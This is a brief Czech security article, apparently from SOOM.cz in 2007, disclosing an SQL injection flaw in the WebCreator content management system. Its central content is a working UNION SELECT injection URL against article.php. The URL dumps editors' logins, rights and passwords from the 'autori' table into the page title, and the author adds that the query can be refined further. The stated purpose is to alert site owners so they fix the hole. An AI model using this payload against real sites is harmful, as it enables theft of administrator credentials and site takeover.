HACK webcreatoru
Zdroj: SOOM.cz [ISSN 1804-7270]
Autor: Studna
Datum: 8.1.2007
Hodnocení/Hlasovalo: 0/0
Našel jsem chybu, pomocí které je možné nechat si vypsat redaktory v tomto RS.
Nevím, jestly tuto chybu již neobjevil, ale stejně.
Přišel jsem na ní a chci se podělit.
Tento článek slouží jenom pro uživatele tohoto RS, aby chyby opravili.
Řekl bych, že stačí pouze jedna jediná řádka a pochopí všichni(aspon ty zdatnější).
http://web-pouzivajici-webcreator.tld/article.php?id=0+*NION+SELECT+login,prava,
prava,prava,login,heslo,
heslo,prava,heslo,heslo,heslo+FROM+autori+--+
*=U
Výhazí vám to všechno důležitý.
Dotaz se dá dále upravovat a třídit podle práv.
V TITLE stránky Vám to napíše:
neco - [heslo] - [login]
Tak si to běžte hnedka zabezpečit.
S pozdravem
Studna
E-Mail: booboo@centrum.cz
ICQ: 192074264
Článek nesmí být zneužíván k nelegálním účelů!!!